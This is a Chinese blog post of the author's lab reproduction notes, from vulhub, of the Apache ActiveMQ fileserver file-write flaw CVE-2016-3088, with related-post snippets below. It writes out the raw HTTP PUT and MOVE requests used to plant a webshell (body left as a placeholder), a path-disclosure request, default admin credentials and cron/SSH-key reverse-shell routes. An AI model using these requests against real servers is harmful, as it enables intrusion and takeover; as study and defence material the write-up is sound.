Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)

最新推荐文章于 2024-02-20 15:39:02 发布
最新推荐文章于 2024-02-20 15:39:02 发布
阅读量638 收藏
点赞数
分类专栏: 渗透测试自学日志之漏洞复现篇 文章标签: apache 安全 web安全
原文链接:https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.zh-cn.md
版权

本文来源于vulhub漏洞库,为本人复现笔记,如有侵权可联系我删除*
该漏洞工作中遇到过几次,记个笔记先

漏洞详情

ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。
fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:

  • 其使用率并不高
  • 文件操作容易出现漏洞

所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);
在5.14.0版本以后,彻底删除了fileserver应用。

在测试过程中,可以关注ActiveMQ的版本,避免走弯路。

本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。

文件写入有几种利用方法:

  • 写入webshell
  • 写入cron或ssh key等文件
  • 写入jar或jetty.xml等库和配置文件

写入webshell的好处是,门槛低更方便,但前面也说了fileserver不解析jsp,admin和api两个应用都需要登录才能访问(有默认密码),所以有点鸡肋;写入cron或ssh key,好处是直接反弹拿shell,也比较方便,缺点是需要root权限;写入jar,稍微麻烦点(需要jar的后门),写入xml配置文件,这个方法比较靠谱,但有个鸡肋点是:我们需要知道activemq的绝对路径。

分别说一下上述几种利用方法。

漏洞复现

写入webshell

写入webshell,需要写在admin或api应用中,而这俩应用都需要登录才能访问。
http://10.155.22.42:8161/admin/页面存在默认账号密码,默认的ActiveMQ账号密码均为admin。

一、获取路径有两种方式
  1. 我工作中一般是:
put /fileserver/a../../%08/../%08/..%08/.%08/%08 HTTP/1.1

然后会爆出物理路径。

C:\ZTE E_guard\USMS\CoreService\bin\activemq\webapps\admin
C:\ZTE E_guard\USMS\CoreService\bin\activemq\webapps\fileserver\
  1. 或者访问http://your-ip:8161/admin/test/systemProperties.jsp,查看ActiveMQ的绝对路径:
    在这里插入图片描述
二、PUT一个JSP文件到fileserver目录
PUT /fileserver/2.txt HTTP/1.1
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 120976

webshell...
三、利用MOVE方法将该JSP移动到admin目录
MOVE /fileserver/2.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/s.jsp
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0
四、访问webshell
maverickpig
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ActiveMQ的BlobMessage传输文件示例:完全嵌入式的使用jetty的fileserver
KimmKing的技术博客
07-23 1万+
上文《ActiveMQ传输文件的几种方式原理与优劣》中提到BlobMessage这种利用fileserver中转的高效处理文件的方式。 其实ActiveMQ自带的web console中已经有了fileserver的demo,位于ActiveMQ安装目录的webapps下。 启动ActiveMQ的时候,如果配置文件中import了jetty.xml,一般会自动加载这个fileserver,就可
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具,ActiveMQ漏洞,反序列化漏洞CVE-2015-5254,利用工具,工具
记一次ActiveMQ漏洞利用
未完成的歌~的博客
08-25 738
Apache ActiveMQApache 软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务、集群、Spring Framework 等。随着中间件的启动,会打开两个端口,61616 是工作端口,消息在这个端口进行传递;8161 是 Web 管理控制台。
CVE-2016-3088(ActiveMQ任意文件写入漏洞
最新发布
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-20 1233
漏洞出现在 fileserver 应用中,漏洞原理是fileserver 支持写入文件(但不解析 jsp),同时支持移动文件(MOVE 请求)。所以我们只需写入一个文件,然后使用 MOVE 请求将其移动到任意位置,造成任意文件写入漏洞
三、【漏洞复现】ActiveMQ Fileserver远程代码执行漏洞
weixin_52351575的博客
09-20 651
ActiveMQ Web控制台分为三个应用程序:admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能使用,fileserver不需要登录。此漏洞出现在Fileserver应用程序中,该漏洞的原理实际上非常简单,即文件服务器支持写入文件(但不解析JSP),同时支持移动文件(MOVE请求)。1、编写Webshel​​l(方便,但文件服务器不需要解析jsp,admin和api都需要登录才能访问)
ActiveMQ FileServer漏洞(详细)
weixin_30498921的博客
06-23 572
半个月前,巡检时发现服务器出现不明进程,对其进行了处理,由于当时没有做详细记录,在这里把大致过程描述一下. 症状: ps命令发现出现几个不明进程,   1.于/tmp下运行的,名称随机的进程.占用CPU高达100%,确认为挖矿机   2.于activemq下运行的不明进程,占用CPU很低,kill -9 杀死进程后会自动重启(当时以为是activemq的正常进程,后核对后发现该进程不属于a...
ActiveMQ漏洞总结
qq_42176207的博客
05-08 7525
ActiveMQ Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。 Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 Ac
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088)复现及排查
dayouzi的博客
08-14 1940
ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
Apache ActiveMQ Fileserver远程代码执行漏洞复现(CVE-2016-3088)
Alluresec的博客
11-20 690
Apache ActiveMQ Fileserver远程代码执行漏洞复现(CVE-2016-3088) 0X00简介 Apache ActiveMQApache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 0X01漏洞概述 ActiveMQ的web控制台分三个应用,分别是admin、api和fi...
ActiveMQ反序列化漏洞CVE-2015-5254) 漏洞利用工具
11-25
ActiveMQ反序列化漏洞CVE-2015-5254)漏洞利用工具,说明文档已存在请进行查看
apache-activemq-5.0.0-src.zip_ActiveMQ代码_activemq_activemq.src
09-20
ActiveMQ代码,包括开发想到和开发例子。
apache-activemq-5.16.5-bin.tar.gz 下载(5积分)
08-17
Apache ActiveMQApache软件基金会的一个开源项目,是一个基于消息的通信中间件。ActiveMQ是JMS的一个具体实现,支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用,使用STOMP协议通过websockets在Web...
apache-activemq-5.17.3
12-27
apache-activemq,运行需要依赖的jdk版本为11+
ActiveMQ任意文件写入漏洞CVE-2016-3088)复现
菲曼巴的博客
11-23 656
一、漏洞描述 该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。 二、影响版本 Apache ActiveMQ 5.0.0 - 5.13.2 三、环境搭建 1、下载、搭建vulhub 2、下载、安装docker服务,使用docker-co
Apache ActiveMQ漏洞利用总结
qq_42430287的博客
04-24 1789
Apache ActiveMQ漏洞利用总结
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
weixin_44047654的博客
11-25 2891
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
ActiveMQ  任意文件上传 漏洞 PUT
U_U520的博客
01-10 1146
ActiveMQ Web控制台分为三个应用程序:其中admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;是消息队列的容器,专注于高并发的环境,比如天猫淘宝一秒钟上亿请求,就好比是水池,把大量短时间无法处理的数据,冗余囤积到ActiveMQ里,再分门别类,按类专门处理,从而提高处理效率。方法1 PUT /fileserver/a../../%08/..%08/.%08/%08。注意: 返回包必须是204 才能证明执行成功。
Apache ActiveMQ jolokia 远程代码执行漏洞
时光不老的博客
11-29 2012
漏洞存在于Jolokia服务的请求处理方式中,结合ActiveMQ的配置不当和Java的高级功能,允许已认证的用户通过发送特定格式的HTTP请求来执行危险操作。ActiveMQ的内部配置允许org.jolokia.http.AgentServlet处理来自/api/jolokia的请求,而没有足够的安全检查来防止恶意操作。
ActiveMQ传输文件的几种方式原理与优劣
热门推荐
KimmKing的技术博客
12-20 5万+
本文讨论ActiveMQ传输文件的几种方法的原理及其利弊,作为消息发送、直接传输文件、使用ftp或http中转。最后介绍扩展ActiveMQ实现自定义文件传输方式,讨论如何实现高效的文件传输。by kimmking 作为消息发送 按照JMS规范,为了保证可靠性,所有的消息都应该是发送到broker,然后交由broker来投递的。也即是说其实JMS是不建议或不支持传输文件的。 对于比较小的文件
cve-2016-3088
07-27
CVE-2016-3088是指Apache ActiveMQ中的一个安全漏洞。该漏洞允许攻击者通过特制的HTTP请求在目标服务器上执行任意命令。\[1\]为了利用这个漏洞,攻击者需要上传一个包含恶意代码的文件,并将其移动到能够执行JSP文件的文件夹中。然后,攻击者可以通过访问目标文件来执行命令并获取返回的数据。\[3\]为了实现计划任务反弹,攻击者还可以将文件移动到/etc/cron.d目录下,并使用nc命令监听指定端口等待回显。\[3\] 修复这个漏洞的方法是升级Apache ActiveMQ到5.14或更高版本。5.14及以后的版本取消了fileserver应用,从而消除了这个漏洞的风险。\[3\]如果升级会对目前业务持续性产生影响,可以通过改写配置文件来解决问题。具体来说,可以修改ActiveMQ根目录下conf目录中的jetty.xml文件,将fileserver相关行进行注释操作。\[3\]更多关于该漏洞的信息可以参考Apache ActiveMQ的安全公告。\[3\] #### 引用[.reference_title] - *1* *2* [ActiveMQ远程代码执行漏洞(CVE-2016-3088)](https://blog.csdn.net/weixin_44047654/article/details/128033455)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CVE-2016-3088](https://blog.csdn.net/weixin_52084568/article/details/129194108)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值